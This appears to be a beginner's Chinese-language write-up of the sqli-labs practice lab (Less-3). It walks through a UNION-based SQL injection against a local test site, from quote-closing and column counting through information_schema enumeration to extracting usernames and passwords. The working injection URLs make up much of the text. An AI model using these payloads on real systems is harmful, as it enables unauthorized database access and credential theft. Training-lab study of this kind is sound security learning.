首先,先看一些基础知识吧!!!!本人只是初学者,记录一下自己的学习过程,有什么错误之处请指出,谢谢!大佬请绕过!!!!
url编码:一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加个%。具体的编码对应请看w3school上的编码表:http://www.w3school.com.cn/tags/html_ref_urlencode.html
常见的有:空格是%20,单引号是%27, 井号是%23,双引号是%22
判断sql注入(显错和基于错误的盲注):单引号,and 1=1 ,and 1=2,or 1=1 , or 1=2等
判断基于时间的盲注:在上面的基础上,加个sleep函数 ,如sleep(8) (函数不同数据库有所不同)sql 注入的基本步骤(这个跟sqlmap的步骤基本一致吧)
三种常见注释符:# 、--+( 后边有空格 )、/**/ 序列
sql注入基本注入步骤
判断是什么类型注入
获取数据库用户,版本,当前连接的数据库等信息
猜解数据库、表的信息
猜解列、字段信息
最后猜解出数据就可以了!!
首先在源码中加入:
echo "your sql statement is ".$sql."<br>";
用来输出你的sql语句,可以更加方便直观的理解此过程。
注:下面的可能有很多种注入方法,仅举例一种。我主要详细记录Less 3 ,less 1和less2方法类似。
less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)
首先,设置?d=1进行测试,正常访问,可以成功显示数据:
http://127.0.0.1/sqllibs/Less-3/?id=1
可以看到其查询语句为:SELECT * FROM users WHERE id=('1')
则加 ‘ 进行判断,结果显示语法错误:
http://127.0.0.1/sqllibs/Less-3/?id=1'
因为 查询语句变成了:SELECT * FROM users WHERE id=('1''),很明显出现了错误。因此,进行闭合 ‘)—+ ,执行结果如下:
http://127.0.0.1/sqllibs/Less-3/?id=1')—+
可以正常执行,现在来猜解字段长度,通过order by N(N为字段长度)
http://127.0.0.1/sqllibs/Less-3/?id=1')order by 3—+
当 order by 3是,正常返回,说明字段长度N>=3,则猜解4:
http://127.0.0.1/sqllibs/Less-3/?id=1')order by 4—+
返回错误,则说明字段长度为3。令左边id=-1,进行union select 语句拼接查询,则:
http://127.0.0.1/sqllibs/Less-3/?id=-1') union select 1,2,3--+
返回结果为,2,3,下面就开始真正查询数据库的各种信息了。可以看到只有第2列和第3列的结果显示在网页上,所以就只能用2,3这个位置了。但是两个位置应该是不够用的,这时就需要用到数据库的连接函数了,常用的是concat和concat_ws,其中concat_ws的第一个参数是连接字符串的分隔符。
user():返回当前数据库连接使用的用户
database():返回当前数据库连接使用的数据库
version():返回当前数据库的版本
:的十进制ASCII是58 ,空格的十进制ASCII是32,主要是以:进行分隔。
http://127.0.0.1/sqllibs/Less-3/?id=-1') union select 1,2,concat_ws(char(32,58,32),user(),database(),version())—+
可以看到用户名为:root@localhost,数据库为:security,数据库版本号为:5.5.53
接下来查询security数据库中有哪些表。首先说一下mysql的数据库information_schema。它是系统数据库,记录是当前数据库的数据库,表,列,用户权限等信息,下面说一下常用的几个表。
SCHEMATA:储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等。
TABLES:储存mysql中的表信息,包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。
COLUMNS:储存mysql中表的列信息,包括这个表的所有列以及每个列的信息,该列是表中的第几列,列的数据类型,列的编码类型,列的权限,列的注释等。
通过直接在mysql控制台实验可以看到,查询information_schema中的信息时,使用where语句值不能直接用英文,要用单引号包裹着,当然用十六进制表示也可以。
security编码后为:0x7365637572697479
http://127.0.0.1/sqllibs/Less-3/?id=-1') union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479--+
http://127.0.0.1/sqllibs/Less-3/?id=-1') union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1--+
http://127.0.0.1/sqllibs/Less-3/?id=-1') union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1--+
猜解出users表,进一步猜解
http://127.0.0.1/sqllibs/Less-3/?id=-1') union select 1,2,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1—+
猜解出ID字段
http://127.0.0.1/sqllibs/Less-3/?id=-1') union select 1,2,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 1,1--+
猜解出username字段
http://127.0.0.1/sqllibs/Less-3/?id=-1') union select 1,2,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 2,1—+
猜解出password字段
http://127.0.0.1/sqllibs/Less-3/?id=-1') union select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 2,1—+
成功查询出数据id:3,username:Dummy,password:p@ssword